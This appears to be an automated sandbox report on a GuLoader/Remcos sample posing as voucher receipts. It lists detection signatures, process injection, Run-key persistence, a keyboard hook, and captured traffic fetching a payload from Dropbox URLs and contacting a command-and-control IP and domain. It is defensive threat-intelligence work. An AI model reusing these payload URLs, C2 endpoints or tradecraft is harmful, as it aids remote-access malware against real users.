Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe

Overview

General Information

Sample name:Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe
Analysis ID:1637330
MD5:bd77910e1cdead3cdd559950952536e9
SHA1:69775eb9e64ad8e34158e5d886d3ff517febde39
SHA256:e11a97236afde003d97440b91a471a73f59fcd2c6f40cc4dde9f7ac57e67ee5d
Tags:exeuser-TornadoAV_dev
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious PE digital signature
Creates a thread in another existing process (thread injection)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" MD5: BD77910E1CDEAD3CDD559950952536E9)
    • IMCCPHR.exe (PID: 2564 cmdline: "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" MD5: 69A21227EB75F9100BAFD6CE573A1DC0)
    • IMCCPHR.exe (PID: 5916 cmdline: "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" MD5: 69A21227EB75F9100BAFD6CE573A1DC0)
    • IMCCPHR.exe (PID: 6868 cmdline: "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" MD5: 69A21227EB75F9100BAFD6CE573A1DC0)
    • IMCCPHR.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" MD5: 69A21227EB75F9100BAFD6CE573A1DC0)
  • Udarter.exe (PID: 3812 cmdline: "C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe" MD5: BD77910E1CDEAD3CDD559950952536E9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Atrulx\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000002.00000002.2648233506.0000000006091000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: IMCCPHR.exe PID: 6628JoeSecurity_RemcosYara detected Remcos RATJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe, ProcessId: 6628, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Skruplers

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-13T14:40:17.508480+010020365941Malware Command and Control Activity Detected192.168.2.1249757103.47.146.1613219TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-13T14:40:19.714110+010028033043Unknown Traffic192.168.2.1249758178.237.33.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-13T14:40:11.222646+010028032702Potentially Bad Traffic192.168.2.1249755162.125.66.18443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeAvira: detection malicious, Label: TR/AD.NsisInject.udgyk
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeReversingLabs: Detection: 18%
            Multi AV Scanner detection for submitted file
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeVirustotal: Detection: 23%Perma Link
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeReversingLabs: Detection: 18%
            Yara detected Remcos RAT
            Source: Yara matchFile source: 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: IMCCPHR.exe PID: 6628, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Atrulx\logs.dat, type: DROPPED
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.12:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.12:49756 version: TLS 1.2
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00405470 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405470
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00405E97 FindFirstFileA,FindClose,2_2_00405E97
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_0040264F FindFirstFileA,2_2_0040264F
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeCode function: 15_2_00405470 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,15_2_00405470
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeCode function: 15_2_00405E97 FindFirstFileA,FindClose,15_2_00405E97
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeCode function: 15_2_0040264F FindFirstFileA,15_2_0040264F

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.12:49757 -> 103.47.146.161:3219
            Source: global trafficTCP traffic: 192.168.2.12:49757 -> 103.47.146.161:3219
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: AS45671-NET-AUWholesaleServicesProviderAU AS45671-NET-AUWholesaleServicesProviderAU
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.12:49758 -> 178.237.33.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.12:49755 -> 162.125.66.18:443
            Source: global trafficHTTP traffic detected: GET /scl/fi/0dy2db3sb0nktw61dep7z/GzBWRKH211.bin?rlkey=wnrsfi0kxker6aq6nvrl7cxr1&st=k83hkkdb&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: www.dropbox.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cd/0/get/ClyX48MYB0mVuxdHbaWDBGzUQbXf8hr01cGU3kByQMca-WvMkOIru6aYnUrLvJ2xwCLDCkICrDXwShbcmZrCM0ekm1wrG34Kf_9caEux4fxbkSsjRtoJs97XE2cQdiUp3qxinXUhJuF4RWo49_gdteit/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: ucc837886400c4962c820c7b7765.dl.dropboxusercontent.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /scl/fi/0dy2db3sb0nktw61dep7z/GzBWRKH211.bin?rlkey=wnrsfi0kxker6aq6nvrl7cxr1&st=k83hkkdb&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: www.dropbox.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cd/0/get/ClyX48MYB0mVuxdHbaWDBGzUQbXf8hr01cGU3kByQMca-WvMkOIru6aYnUrLvJ2xwCLDCkICrDXwShbcmZrCM0ekm1wrG34Kf_9caEux4fxbkSsjRtoJs97XE2cQdiUp3qxinXUhJuF4RWo49_gdteit/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: ucc837886400c4962c820c7b7765.dl.dropboxusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://apis.google.com/js/ 'nonce-zOyiKVEmwGKxnLKo3VlkMhPZNfE=' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ equals www.yahoo.com (Yahoo)
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: owcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client ht equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
            Source: global trafficDNS traffic detected: DNS query: ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com
            Source: global trafficDNS traffic detected: DNS query: msi25.dynnamn.ru
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/X
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.000000000800C000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpz
            Source: Udarter.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe, 00000002.00000002.2647224029.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe, 00000002.00000000.1271688344.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com/js/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com/%
            Source: IMCCPHR.exe, 0000000E.00000003.2850621867.0000000007FB1000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com/REM
            Source: IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com/cd/0/get/ClyX48MYB0mVuxdHbaWDBGzUQbXf
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com/z
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F48000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/B
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/0dy2db3sb0nktw61dep7z/GzBWRKH211.bin?rlkey=wnrsfi0kxker6aq6nvrl7cxr1&
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.12:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.12:49756 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Installs a global keyboard hook
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\IME\SHARED\IMCCPHR.exeJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00404FDE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_00404FDE

            E-Banking Fraud

            barindex
